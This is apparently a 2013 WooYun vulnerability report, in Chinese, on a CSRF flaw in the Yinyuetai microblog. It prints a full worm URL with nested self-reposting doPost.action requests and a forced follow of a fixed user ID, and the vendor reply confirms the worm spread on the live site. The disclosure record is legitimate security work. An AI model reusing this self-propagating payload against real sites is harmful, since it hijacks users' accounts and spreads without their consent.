漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-025342
漏洞标题:音悦台 ,无限刷粉丝,已经蠕虫,无限粉丝中传播
相关厂商:音悦台
漏洞作者: 小囧
提交时间:2013-06-07 13:32
修复时间:2013-07-22 13:33
公开时间:2013-07-22 13:33
漏洞类型:CSRF
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-06-07: 细节已通知厂商并且等待厂商处理中
2013-06-07: 厂商已经确认,细节仅向厂商公开
2013-06-17: 细节向核心白帽子及相关领域专家公开
2013-06-27: 细节向普通白帽子公开
2013-07-07: 细节向实习白帽子公开
2013-07-22: 细节向公众公开
简要描述:
好久没上wooyun然后看见一个厂商忽略一个csrf 真心不应该。然后就尝试让他们知道下csrf的威力。
详细说明:
无意间看见的一个忽略的bug评论
上面信息得到是使用的request
然后顺藤摸瓜得到发微博的请求地址:
然后发现 发微博的时候图片地址没有限制或者过滤,
那么我们就用img 的 src 来构造 csrf蠕虫 传播微博
http://i.yinyuetai.com/wb/post/doPost.action?content=aa&picture=http%3A%2F%2Fi.yinyuetai.com%2Fwb%2Fpost%2FdoPost.action%3Fcontent%3Dc%26picture%3Dhttp%253A%252F%252Fi.yinyuetai.com%252Fwb%252Fpost%252FdoPost.action%253Fcontent%253Df%2526picture%253Dhttp%25253A%25252F%25252Fi.yinyuetai.com%25252Ffollow%25252Ffollow%25253Ffriendid%25253D20843262
漏洞证明:
修复方案:
注意csrf
版权声明:转载请注明来源 小囧@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2013-06-07 14:20
厂商回复:
漏洞不该忽略,不过原始发现人不是您,所以给评成中了。害的我们下午紧急部署,果然传播很迅猛。
最新状态:
暂无